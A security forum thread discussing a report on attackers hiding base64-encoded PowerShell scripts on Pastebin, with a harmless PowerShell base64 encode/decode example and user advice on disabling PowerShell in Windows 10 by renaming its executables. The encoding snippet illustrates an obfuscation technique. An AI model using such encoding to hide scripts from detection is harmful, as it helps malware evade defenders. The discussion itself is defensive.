Privacy News Hackers hide base64-encoded PowerShell scripts on Pastebin

[frogboy]

Hackers are encoding malicious PowerShell scripts in base64 and hiding them on plain-text upload sites such as Pastebin, according to a new research report and accompanying blog post by threat intelligence firm Recorded Future.

The report, published on Wednesday, was inspired by a Nov. 17 law-enforcement bulletin that warned of a nation-state threat group attacking public and private entities using techniques that incorporate spear phishing, PowerShell and base64.

“In this case the attacker works on the reasonable assumption that individuals working closely with technology are not restricted in their access to text-based resources, like paste sites and code repositories,” wrote blog post author Chris Pace, Recorded Future's marketing and content director for the EMEA region. “They also take advantage of the fact that security at the web layer may not be able to decode and identify that this program is malicious.”

Using its own threat intelligence analytical engine, Recorded Future scoured online code repositories, paste sites and criminal forums for references to malicious PowerShell scripts leveraging Base64. Sure enough, the company encountered numerous examples of the specific technique being employed in the wild.

Full Article. Hackers hide base64-encoded PowerShell scripts on Pastebin

 

[DardiM]

Thanks for the share

Recently, I have seen a base 36 encoded part in the Malware vault.
(a-z 0-9)

"Recorded Future recommends setting up alerts for instances when base64-encoded strings and Pastebin URIs are collectively detected on network traffic"

When they will be able to detect it, another Base will be used
The main advantage of Base 64 encoding, it is that the result is a string with chars from A-Z a-z 0-9 + / (and = but as a suffix char on certain conditions)
and easily encoded / decoded by Powershell itself (no need of a lot of codes)

Spoiler: example

$clear_text = "I am a bad person"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($clear_text)
$Base64_encoded_text =[Convert]::ToBase64String($Bytes)
$Base64_encoded_text => only for the example, to see the result if you test
​

=> "SQAgAGEAbQAgAGEAIABiAGEAZAAgAHAAZQByAHMAbwBuAA=="

As short to decode :

$Base64_encoded_text= “SQAgAGEAbQAgAGEAIABiAGEAZAAgAHAAZQByAHMAbwBuAA==”
$clear_text= [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Base64_encoded_text))
$Base64_encoded_text => only for the example, to see the result if you test​

But in JavaScript / JScript / vbs used with Windows Script Host (not with a browser)
=> more steps

 

[Entreri]

Anyone know how to disable PowerShell for Win10 without using 3rd party software?

I tried disabling via add-remove features, then registry edits (which I think I did correctly)...nothing works due to what appears to be a Win10 bug. Only thing I could do via registry was make PowerShell access restricted.

 

[DardiM]

Anyone know how to disable PowerShell for Windows 10 without using 3rd party software?

I tried disabling via add-remove features, then registry edits (which I think I did correctly)...nothing works due to what appears to be a Windows 10 bug. Only thing I could do via registry was make PowerShell access restricted.

"I tried disabling via add-remove features"

=>You have tried like on the screenshot without success ?​

 

[Entreri]

^Yeah, I tried it just like in the screen shot, Powershell is still there and working. "Turn Windows features on and off".

That is when I went to registry edits, it still works after that too. Finally I just made it restricted.

 

[shmu26]

^Yeah, I tried it just like in the screen shot, Powershell is still there and working. "Turn Windows features on and off".

That is when I went to registry edits, it still works after that too. Finally I just made it restricted.

I had the same problem as you.
The only way that worked for me was to rename the various powershell.exe files (there are 4 of them) to a different name, such as powershell.old.exe. If you do that, I think that the malware will not be able to find it.

But when you get a Windows update, you have to check if powershell was re-installed. Because lately, Microsoft has been working on Powershell, and they push updates.

EDIT: you can just delete them entirely, but then, if you need to use them for some reason, you have a problem.

 

[Entreri]

I had the same problem as you.
The only way that worked for me was to rename the various powershell.exe files (there are 4 of them) to a different name, such as powershell.old.exe. If you do that, I think that the malware will not be able to find it.

But when you get a Windows update, you have to check if powershell was re-installed. Because lately, Microsoft has been working on Powershell, and they push updates.

EDIT: you can just delete them entirely, but then, if you need to use them for some reason, you have a problem.

Thanks, I will rename the files.

 

[shmu26]

Thanks, I will rename the files.

I know you asked how to do it without a 3rd party program, but I can't help mentioning that process lasso does a good job at this, and besides, it is free, and non-intrusive.